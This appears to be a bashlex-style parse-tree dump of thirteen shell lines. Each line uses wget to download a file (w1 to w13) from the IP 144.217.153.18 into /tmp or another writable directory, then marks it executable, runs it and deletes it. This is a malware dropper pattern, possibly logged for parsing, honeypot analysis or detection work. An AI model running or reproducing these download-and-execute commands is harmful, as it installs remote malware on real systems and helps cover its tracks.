ListNode(lineno=2, pos=(12, 126), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 96), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 96), word='http://144.217.153.18/w1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(96, 97)),
  CommandNode(lineno=2, pos=(98, 109), parts=[
    WordNode(lineno=2, pos=(98, 103), word='chmod'),
    WordNode(lineno=2, pos=(104, 106), word='+x'),
    WordNode(lineno=2, pos=(107, 109), word='w1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(109, 110)),
  CommandNode(lineno=2, pos=(111, 115), parts=[
    WordNode(lineno=2, pos=(111, 115), word='./w1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(115, 116)),
  CommandNode(lineno=2, pos=(117, 126), parts=[
    WordNode(lineno=2, pos=(117, 119), word='rm'),
    WordNode(lineno=2, pos=(120, 123), word='-rf'),
    WordNode(lineno=2, pos=(124, 126), word='w1'),
  ]),
])
ListNode(lineno=3, pos=(127, 241), parts=[
  CommandNode(lineno=3, pos=(127, 134), parts=[
    WordNode(lineno=3, pos=(127, 129), word='cd'),
    WordNode(lineno=3, pos=(130, 134), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(135, 137)),
  CommandNode(lineno=3, pos=(138, 149), parts=[
    WordNode(lineno=3, pos=(138, 140), word='cd'),
    WordNode(lineno=3, pos=(141, 149), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(150, 152)),
  CommandNode(lineno=3, pos=(153, 160), parts=[
    WordNode(lineno=3, pos=(153, 155), word='cd'),
    WordNode(lineno=3, pos=(156, 160), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(161, 163)),
  CommandNode(lineno=3, pos=(164, 172), parts=[
    WordNode(lineno=3, pos=(164, 166), word='cd'),
    WordNode(lineno=3, pos=(167, 172), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(173, 175)),
  CommandNode(lineno=3, pos=(176, 180), parts=[
    WordNode(lineno=3, pos=(176, 178), word='cd'),
    WordNode(lineno=3, pos=(179, 180), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(180, 181)),
  CommandNode(lineno=3, pos=(182, 211), parts=[
    WordNode(lineno=3, pos=(182, 186), word='wget'),
    WordNode(lineno=3, pos=(187, 211), word='http://144.217.153.18/w2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(211, 212)),
  CommandNode(lineno=3, pos=(213, 224), parts=[
    WordNode(lineno=3, pos=(213, 218), word='chmod'),
    WordNode(lineno=3, pos=(219, 221), word='+x'),
    WordNode(lineno=3, pos=(222, 224), word='w2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 230), parts=[
    WordNode(lineno=3, pos=(226, 230), word='./w2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(230, 231)),
  CommandNode(lineno=3, pos=(232, 241), parts=[
    WordNode(lineno=3, pos=(232, 234), word='rm'),
    WordNode(lineno=3, pos=(235, 238), word='-rf'),
    WordNode(lineno=3, pos=(239, 241), word='w2'),
  ]),
])
ListNode(lineno=4, pos=(242, 356), parts=[
  CommandNode(lineno=4, pos=(242, 249), parts=[
    WordNode(lineno=4, pos=(242, 244), word='cd'),
    WordNode(lineno=4, pos=(245, 249), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(250, 252)),
  CommandNode(lineno=4, pos=(253, 264), parts=[
    WordNode(lineno=4, pos=(253, 255), word='cd'),
    WordNode(lineno=4, pos=(256, 264), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(265, 267)),
  CommandNode(lineno=4, pos=(268, 275), parts=[
    WordNode(lineno=4, pos=(268, 270), word='cd'),
    WordNode(lineno=4, pos=(271, 275), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(276, 278)),
  CommandNode(lineno=4, pos=(279, 287), parts=[
    WordNode(lineno=4, pos=(279, 281), word='cd'),
    WordNode(lineno=4, pos=(282, 287), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(288, 290)),
  CommandNode(lineno=4, pos=(291, 295), parts=[
    WordNode(lineno=4, pos=(291, 293), word='cd'),
    WordNode(lineno=4, pos=(294, 295), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(295, 296)),
  CommandNode(lineno=4, pos=(297, 326), parts=[
    WordNode(lineno=4, pos=(297, 301), word='wget'),
    WordNode(lineno=4, pos=(302, 326), word='http://144.217.153.18/w3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(326, 327)),
  CommandNode(lineno=4, pos=(328, 339), parts=[
    WordNode(lineno=4, pos=(328, 333), word='chmod'),
    WordNode(lineno=4, pos=(334, 336), word='+x'),
    WordNode(lineno=4, pos=(337, 339), word='w3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(339, 340)),
  CommandNode(lineno=4, pos=(341, 345), parts=[
    WordNode(lineno=4, pos=(341, 345), word='./w3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(345, 346)),
  CommandNode(lineno=4, pos=(347, 356), parts=[
    WordNode(lineno=4, pos=(347, 349), word='rm'),
    WordNode(lineno=4, pos=(350, 353), word='-rf'),
    WordNode(lineno=4, pos=(354, 356), word='w3'),
  ]),
])
ListNode(lineno=5, pos=(357, 471), parts=[
  CommandNode(lineno=5, pos=(357, 364), parts=[
    WordNode(lineno=5, pos=(357, 359), word='cd'),
    WordNode(lineno=5, pos=(360, 364), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(365, 367)),
  CommandNode(lineno=5, pos=(368, 379), parts=[
    WordNode(lineno=5, pos=(368, 370), word='cd'),
    WordNode(lineno=5, pos=(371, 379), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(380, 382)),
  CommandNode(lineno=5, pos=(383, 390), parts=[
    WordNode(lineno=5, pos=(383, 385), word='cd'),
    WordNode(lineno=5, pos=(386, 390), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(391, 393)),
  CommandNode(lineno=5, pos=(394, 402), parts=[
    WordNode(lineno=5, pos=(394, 396), word='cd'),
    WordNode(lineno=5, pos=(397, 402), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(403, 405)),
  CommandNode(lineno=5, pos=(406, 410), parts=[
    WordNode(lineno=5, pos=(406, 408), word='cd'),
    WordNode(lineno=5, pos=(409, 410), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(410, 411)),
  CommandNode(lineno=5, pos=(412, 441), parts=[
    WordNode(lineno=5, pos=(412, 416), word='wget'),
    WordNode(lineno=5, pos=(417, 441), word='http://144.217.153.18/w4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(441, 442)),
  CommandNode(lineno=5, pos=(443, 454), parts=[
    WordNode(lineno=5, pos=(443, 448), word='chmod'),
    WordNode(lineno=5, pos=(449, 451), word='+x'),
    WordNode(lineno=5, pos=(452, 454), word='w4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(454, 455)),
  CommandNode(lineno=5, pos=(456, 460), parts=[
    WordNode(lineno=5, pos=(456, 460), word='./w4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(460, 461)),
  CommandNode(lineno=5, pos=(462, 471), parts=[
    WordNode(lineno=5, pos=(462, 464), word='rm'),
    WordNode(lineno=5, pos=(465, 468), word='-rf'),
    WordNode(lineno=5, pos=(469, 471), word='w4'),
  ]),
])
ListNode(lineno=6, pos=(472, 586), parts=[
  CommandNode(lineno=6, pos=(472, 479), parts=[
    WordNode(lineno=6, pos=(472, 474), word='cd'),
    WordNode(lineno=6, pos=(475, 479), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(480, 482)),
  CommandNode(lineno=6, pos=(483, 494), parts=[
    WordNode(lineno=6, pos=(483, 485), word='cd'),
    WordNode(lineno=6, pos=(486, 494), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(495, 497)),
  CommandNode(lineno=6, pos=(498, 505), parts=[
    WordNode(lineno=6, pos=(498, 500), word='cd'),
    WordNode(lineno=6, pos=(501, 505), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(506, 508)),
  CommandNode(lineno=6, pos=(509, 517), parts=[
    WordNode(lineno=6, pos=(509, 511), word='cd'),
    WordNode(lineno=6, pos=(512, 517), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(518, 520)),
  CommandNode(lineno=6, pos=(521, 525), parts=[
    WordNode(lineno=6, pos=(521, 523), word='cd'),
    WordNode(lineno=6, pos=(524, 525), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(525, 526)),
  CommandNode(lineno=6, pos=(527, 556), parts=[
    WordNode(lineno=6, pos=(527, 531), word='wget'),
    WordNode(lineno=6, pos=(532, 556), word='http://144.217.153.18/w5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(556, 557)),
  CommandNode(lineno=6, pos=(558, 569), parts=[
    WordNode(lineno=6, pos=(558, 563), word='chmod'),
    WordNode(lineno=6, pos=(564, 566), word='+x'),
    WordNode(lineno=6, pos=(567, 569), word='w5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(569, 570)),
  CommandNode(lineno=6, pos=(571, 575), parts=[
    WordNode(lineno=6, pos=(571, 575), word='./w5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(575, 576)),
  CommandNode(lineno=6, pos=(577, 586), parts=[
    WordNode(lineno=6, pos=(577, 579), word='rm'),
    WordNode(lineno=6, pos=(580, 583), word='-rf'),
    WordNode(lineno=6, pos=(584, 586), word='w5'),
  ]),
])
ListNode(lineno=7, pos=(587, 701), parts=[
  CommandNode(lineno=7, pos=(587, 594), parts=[
    WordNode(lineno=7, pos=(587, 589), word='cd'),
    WordNode(lineno=7, pos=(590, 594), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(595, 597)),
  CommandNode(lineno=7, pos=(598, 609), parts=[
    WordNode(lineno=7, pos=(598, 600), word='cd'),
    WordNode(lineno=7, pos=(601, 609), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(610, 612)),
  CommandNode(lineno=7, pos=(613, 620), parts=[
    WordNode(lineno=7, pos=(613, 615), word='cd'),
    WordNode(lineno=7, pos=(616, 620), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(621, 623)),
  CommandNode(lineno=7, pos=(624, 632), parts=[
    WordNode(lineno=7, pos=(624, 626), word='cd'),
    WordNode(lineno=7, pos=(627, 632), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(633, 635)),
  CommandNode(lineno=7, pos=(636, 640), parts=[
    WordNode(lineno=7, pos=(636, 638), word='cd'),
    WordNode(lineno=7, pos=(639, 640), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(640, 641)),
  CommandNode(lineno=7, pos=(642, 671), parts=[
    WordNode(lineno=7, pos=(642, 646), word='wget'),
    WordNode(lineno=7, pos=(647, 671), word='http://144.217.153.18/w6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(671, 672)),
  CommandNode(lineno=7, pos=(673, 684), parts=[
    WordNode(lineno=7, pos=(673, 678), word='chmod'),
    WordNode(lineno=7, pos=(679, 681), word='+x'),
    WordNode(lineno=7, pos=(682, 684), word='w6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(684, 685)),
  CommandNode(lineno=7, pos=(686, 690), parts=[
    WordNode(lineno=7, pos=(686, 690), word='./w6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(690, 691)),
  CommandNode(lineno=7, pos=(692, 701), parts=[
    WordNode(lineno=7, pos=(692, 694), word='rm'),
    WordNode(lineno=7, pos=(695, 698), word='-rf'),
    WordNode(lineno=7, pos=(699, 701), word='w6'),
  ]),
])
ListNode(lineno=8, pos=(702, 816), parts=[
  CommandNode(lineno=8, pos=(702, 709), parts=[
    WordNode(lineno=8, pos=(702, 704), word='cd'),
    WordNode(lineno=8, pos=(705, 709), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(710, 712)),
  CommandNode(lineno=8, pos=(713, 724), parts=[
    WordNode(lineno=8, pos=(713, 715), word='cd'),
    WordNode(lineno=8, pos=(716, 724), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(725, 727)),
  CommandNode(lineno=8, pos=(728, 735), parts=[
    WordNode(lineno=8, pos=(728, 730), word='cd'),
    WordNode(lineno=8, pos=(731, 735), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(736, 738)),
  CommandNode(lineno=8, pos=(739, 747), parts=[
    WordNode(lineno=8, pos=(739, 741), word='cd'),
    WordNode(lineno=8, pos=(742, 747), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(748, 750)),
  CommandNode(lineno=8, pos=(751, 755), parts=[
    WordNode(lineno=8, pos=(751, 753), word='cd'),
    WordNode(lineno=8, pos=(754, 755), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(755, 756)),
  CommandNode(lineno=8, pos=(757, 786), parts=[
    WordNode(lineno=8, pos=(757, 761), word='wget'),
    WordNode(lineno=8, pos=(762, 786), word='http://144.217.153.18/w7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(786, 787)),
  CommandNode(lineno=8, pos=(788, 799), parts=[
    WordNode(lineno=8, pos=(788, 793), word='chmod'),
    WordNode(lineno=8, pos=(794, 796), word='+x'),
    WordNode(lineno=8, pos=(797, 799), word='w7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(799, 800)),
  CommandNode(lineno=8, pos=(801, 805), parts=[
    WordNode(lineno=8, pos=(801, 805), word='./w7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(805, 806)),
  CommandNode(lineno=8, pos=(807, 816), parts=[
    WordNode(lineno=8, pos=(807, 809), word='rm'),
    WordNode(lineno=8, pos=(810, 813), word='-rf'),
    WordNode(lineno=8, pos=(814, 816), word='w7'),
  ]),
])
ListNode(lineno=9, pos=(817, 931), parts=[
  CommandNode(lineno=9, pos=(817, 824), parts=[
    WordNode(lineno=9, pos=(817, 819), word='cd'),
    WordNode(lineno=9, pos=(820, 824), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(825, 827)),
  CommandNode(lineno=9, pos=(828, 839), parts=[
    WordNode(lineno=9, pos=(828, 830), word='cd'),
    WordNode(lineno=9, pos=(831, 839), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(840, 842)),
  CommandNode(lineno=9, pos=(843, 850), parts=[
    WordNode(lineno=9, pos=(843, 845), word='cd'),
    WordNode(lineno=9, pos=(846, 850), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(851, 853)),
  CommandNode(lineno=9, pos=(854, 862), parts=[
    WordNode(lineno=9, pos=(854, 856), word='cd'),
    WordNode(lineno=9, pos=(857, 862), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(863, 865)),
  CommandNode(lineno=9, pos=(866, 870), parts=[
    WordNode(lineno=9, pos=(866, 868), word='cd'),
    WordNode(lineno=9, pos=(869, 870), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(870, 871)),
  CommandNode(lineno=9, pos=(872, 901), parts=[
    WordNode(lineno=9, pos=(872, 876), word='wget'),
    WordNode(lineno=9, pos=(877, 901), word='http://144.217.153.18/w8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(901, 902)),
  CommandNode(lineno=9, pos=(903, 914), parts=[
    WordNode(lineno=9, pos=(903, 908), word='chmod'),
    WordNode(lineno=9, pos=(909, 911), word='+x'),
    WordNode(lineno=9, pos=(912, 914), word='w8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(914, 915)),
  CommandNode(lineno=9, pos=(916, 920), parts=[
    WordNode(lineno=9, pos=(916, 920), word='./w8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(920, 921)),
  CommandNode(lineno=9, pos=(922, 931), parts=[
    WordNode(lineno=9, pos=(922, 924), word='rm'),
    WordNode(lineno=9, pos=(925, 928), word='-rf'),
    WordNode(lineno=9, pos=(929, 931), word='w8'),
  ]),
])
ListNode(lineno=10, pos=(932, 1046), parts=[
  CommandNode(lineno=10, pos=(932, 939), parts=[
    WordNode(lineno=10, pos=(932, 934), word='cd'),
    WordNode(lineno=10, pos=(935, 939), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(940, 942)),
  CommandNode(lineno=10, pos=(943, 954), parts=[
    WordNode(lineno=10, pos=(943, 945), word='cd'),
    WordNode(lineno=10, pos=(946, 954), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(955, 957)),
  CommandNode(lineno=10, pos=(958, 965), parts=[
    WordNode(lineno=10, pos=(958, 960), word='cd'),
    WordNode(lineno=10, pos=(961, 965), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(966, 968)),
  CommandNode(lineno=10, pos=(969, 977), parts=[
    WordNode(lineno=10, pos=(969, 971), word='cd'),
    WordNode(lineno=10, pos=(972, 977), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(978, 980)),
  CommandNode(lineno=10, pos=(981, 985), parts=[
    WordNode(lineno=10, pos=(981, 983), word='cd'),
    WordNode(lineno=10, pos=(984, 985), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(985, 986)),
  CommandNode(lineno=10, pos=(987, 1016), parts=[
    WordNode(lineno=10, pos=(987, 991), word='wget'),
    WordNode(lineno=10, pos=(992, 1016), word='http://144.217.153.18/w9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1016, 1017)),
  CommandNode(lineno=10, pos=(1018, 1029), parts=[
    WordNode(lineno=10, pos=(1018, 1023), word='chmod'),
    WordNode(lineno=10, pos=(1024, 1026), word='+x'),
    WordNode(lineno=10, pos=(1027, 1029), word='w9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1029, 1030)),
  CommandNode(lineno=10, pos=(1031, 1035), parts=[
    WordNode(lineno=10, pos=(1031, 1035), word='./w9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1035, 1036)),
  CommandNode(lineno=10, pos=(1037, 1046), parts=[
    WordNode(lineno=10, pos=(1037, 1039), word='rm'),
    WordNode(lineno=10, pos=(1040, 1043), word='-rf'),
    WordNode(lineno=10, pos=(1044, 1046), word='w9'),
  ]),
])
ListNode(lineno=11, pos=(1047, 1165), parts=[
  CommandNode(lineno=11, pos=(1047, 1054), parts=[
    WordNode(lineno=11, pos=(1047, 1049), word='cd'),
    WordNode(lineno=11, pos=(1050, 1054), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1055, 1057)),
  CommandNode(lineno=11, pos=(1058, 1069), parts=[
    WordNode(lineno=11, pos=(1058, 1060), word='cd'),
    WordNode(lineno=11, pos=(1061, 1069), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1070, 1072)),
  CommandNode(lineno=11, pos=(1073, 1080), parts=[
    WordNode(lineno=11, pos=(1073, 1075), word='cd'),
    WordNode(lineno=11, pos=(1076, 1080), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1081, 1083)),
  CommandNode(lineno=11, pos=(1084, 1092), parts=[
    WordNode(lineno=11, pos=(1084, 1086), word='cd'),
    WordNode(lineno=11, pos=(1087, 1092), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1093, 1095)),
  CommandNode(lineno=11, pos=(1096, 1100), parts=[
    WordNode(lineno=11, pos=(1096, 1098), word='cd'),
    WordNode(lineno=11, pos=(1099, 1100), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1100, 1101)),
  CommandNode(lineno=11, pos=(1102, 1132), parts=[
    WordNode(lineno=11, pos=(1102, 1106), word='wget'),
    WordNode(lineno=11, pos=(1107, 1132), word='http://144.217.153.18/w10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1132, 1133)),
  CommandNode(lineno=11, pos=(1134, 1146), parts=[
    WordNode(lineno=11, pos=(1134, 1139), word='chmod'),
    WordNode(lineno=11, pos=(1140, 1142), word='+x'),
    WordNode(lineno=11, pos=(1143, 1146), word='w10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1146, 1147)),
  CommandNode(lineno=11, pos=(1148, 1153), parts=[
    WordNode(lineno=11, pos=(1148, 1153), word='./w10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1153, 1154)),
  CommandNode(lineno=11, pos=(1155, 1165), parts=[
    WordNode(lineno=11, pos=(1155, 1157), word='rm'),
    WordNode(lineno=11, pos=(1158, 1161), word='-rf'),
    WordNode(lineno=11, pos=(1162, 1165), word='w10'),
  ]),
])
ListNode(lineno=12, pos=(1166, 1284), parts=[
  CommandNode(lineno=12, pos=(1166, 1173), parts=[
    WordNode(lineno=12, pos=(1166, 1168), word='cd'),
    WordNode(lineno=12, pos=(1169, 1173), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1174, 1176)),
  CommandNode(lineno=12, pos=(1177, 1188), parts=[
    WordNode(lineno=12, pos=(1177, 1179), word='cd'),
    WordNode(lineno=12, pos=(1180, 1188), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1189, 1191)),
  CommandNode(lineno=12, pos=(1192, 1199), parts=[
    WordNode(lineno=12, pos=(1192, 1194), word='cd'),
    WordNode(lineno=12, pos=(1195, 1199), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1200, 1202)),
  CommandNode(lineno=12, pos=(1203, 1211), parts=[
    WordNode(lineno=12, pos=(1203, 1205), word='cd'),
    WordNode(lineno=12, pos=(1206, 1211), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1212, 1214)),
  CommandNode(lineno=12, pos=(1215, 1219), parts=[
    WordNode(lineno=12, pos=(1215, 1217), word='cd'),
    WordNode(lineno=12, pos=(1218, 1219), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1219, 1220)),
  CommandNode(lineno=12, pos=(1221, 1251), parts=[
    WordNode(lineno=12, pos=(1221, 1225), word='wget'),
    WordNode(lineno=12, pos=(1226, 1251), word='http://144.217.153.18/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1251, 1252)),
  CommandNode(lineno=12, pos=(1253, 1265), parts=[
    WordNode(lineno=12, pos=(1253, 1258), word='chmod'),
    WordNode(lineno=12, pos=(1259, 1261), word='+x'),
    WordNode(lineno=12, pos=(1262, 1265), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1265, 1266)),
  CommandNode(lineno=12, pos=(1267, 1272), parts=[
    WordNode(lineno=12, pos=(1267, 1272), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1272, 1273)),
  CommandNode(lineno=12, pos=(1274, 1284), parts=[
    WordNode(lineno=12, pos=(1274, 1276), word='rm'),
    WordNode(lineno=12, pos=(1277, 1280), word='-rf'),
    WordNode(lineno=12, pos=(1281, 1284), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1285, 1403), parts=[
  CommandNode(lineno=13, pos=(1285, 1292), parts=[
    WordNode(lineno=13, pos=(1285, 1287), word='cd'),
    WordNode(lineno=13, pos=(1288, 1292), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1293, 1295)),
  CommandNode(lineno=13, pos=(1296, 1307), parts=[
    WordNode(lineno=13, pos=(1296, 1298), word='cd'),
    WordNode(lineno=13, pos=(1299, 1307), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1308, 1310)),
  CommandNode(lineno=13, pos=(1311, 1318), parts=[
    WordNode(lineno=13, pos=(1311, 1313), word='cd'),
    WordNode(lineno=13, pos=(1314, 1318), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1319, 1321)),
  CommandNode(lineno=13, pos=(1322, 1330), parts=[
    WordNode(lineno=13, pos=(1322, 1324), word='cd'),
    WordNode(lineno=13, pos=(1325, 1330), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1331, 1333)),
  CommandNode(lineno=13, pos=(1334, 1338), parts=[
    WordNode(lineno=13, pos=(1334, 1336), word='cd'),
    WordNode(lineno=13, pos=(1337, 1338), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1338, 1339)),
  CommandNode(lineno=13, pos=(1340, 1370), parts=[
    WordNode(lineno=13, pos=(1340, 1344), word='wget'),
    WordNode(lineno=13, pos=(1345, 1370), word='http://144.217.153.18/w12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1370, 1371)),
  CommandNode(lineno=13, pos=(1372, 1384), parts=[
    WordNode(lineno=13, pos=(1372, 1377), word='chmod'),
    WordNode(lineno=13, pos=(1378, 1380), word='+x'),
    WordNode(lineno=13, pos=(1381, 1384), word='w12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1384, 1385)),
  CommandNode(lineno=13, pos=(1386, 1391), parts=[
    WordNode(lineno=13, pos=(1386, 1391), word='./w12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1391, 1392)),
  CommandNode(lineno=13, pos=(1393, 1403), parts=[
    WordNode(lineno=13, pos=(1393, 1395), word='rm'),
    WordNode(lineno=13, pos=(1396, 1399), word='-rf'),
    WordNode(lineno=13, pos=(1400, 1403), word='w12'),
  ]),
])
ListNode(lineno=14, pos=(1404, 1522), parts=[
  CommandNode(lineno=14, pos=(1404, 1411), parts=[
    WordNode(lineno=14, pos=(1404, 1406), word='cd'),
    WordNode(lineno=14, pos=(1407, 1411), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1412, 1414)),
  CommandNode(lineno=14, pos=(1415, 1426), parts=[
    WordNode(lineno=14, pos=(1415, 1417), word='cd'),
    WordNode(lineno=14, pos=(1418, 1426), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1427, 1429)),
  CommandNode(lineno=14, pos=(1430, 1437), parts=[
    WordNode(lineno=14, pos=(1430, 1432), word='cd'),
    WordNode(lineno=14, pos=(1433, 1437), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1438, 1440)),
  CommandNode(lineno=14, pos=(1441, 1449), parts=[
    WordNode(lineno=14, pos=(1441, 1443), word='cd'),
    WordNode(lineno=14, pos=(1444, 1449), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1450, 1452)),
  CommandNode(lineno=14, pos=(1453, 1457), parts=[
    WordNode(lineno=14, pos=(1453, 1455), word='cd'),
    WordNode(lineno=14, pos=(1456, 1457), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1457, 1458)),
  CommandNode(lineno=14, pos=(1459, 1489), parts=[
    WordNode(lineno=14, pos=(1459, 1463), word='wget'),
    WordNode(lineno=14, pos=(1464, 1489), word='http://144.217.153.18/w13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1489, 1490)),
  CommandNode(lineno=14, pos=(1491, 1503), parts=[
    WordNode(lineno=14, pos=(1491, 1496), word='chmod'),
    WordNode(lineno=14, pos=(1497, 1499), word='+x'),
    WordNode(lineno=14, pos=(1500, 1503), word='w13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1503, 1504)),
  CommandNode(lineno=14, pos=(1505, 1510), parts=[
    WordNode(lineno=14, pos=(1505, 1510), word='./w13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1510, 1511)),
  CommandNode(lineno=14, pos=(1512, 1522), parts=[
    WordNode(lineno=14, pos=(1512, 1514), word='rm'),
    WordNode(lineno=14, pos=(1515, 1518), word='-rf'),
    WordNode(lineno=14, pos=(1519, 1522), word='w13'),
  ]),
])
